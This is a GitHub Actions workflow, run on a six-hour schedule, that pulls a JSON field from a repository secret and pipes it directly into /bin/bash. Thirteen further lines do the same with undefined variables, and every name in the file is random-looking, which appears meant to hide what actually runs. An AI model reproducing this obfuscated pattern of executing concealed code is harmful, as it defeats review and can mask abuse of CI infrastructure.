name: lingshiwwx

on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lingshiwwx
        env:
          w88948: ${{ secrets.w88948 }}
        run: |
          echo $w88948 | jq -r .fqhs04962 | /bin/bash
          echo $fe61 | jq -r .ywefy29 | /bin/bash
          echo $hwg7085 | jq -r .f15737 | /bin/bash
          echo $r75 | jq -r .d834 | /bin/bash
          echo $fpcu3 | jq -r .l89576 | /bin/bash
          echo $bfhd37039 | jq -r .wv48802 | /bin/bash
          echo $ayukg26 | jq -r .r92 | /bin/bash
          echo $nfkyx498 | jq -r .upcze04192 | /bin/bash
          echo $gyz1493 | jq -r .lqb5898 | /bin/bash
          echo $euyk9 | jq -r .tnrya12742 | /bin/bash
          echo $sv38610 | jq -r .ltvav8 | /bin/bash
          echo $rn4 | jq -r .ft92 | /bin/bash
          echo $r23888 | jq -r .b4 | /bin/bash
          echo $dbq6 | jq -r .tgpw9 | /bin/bash

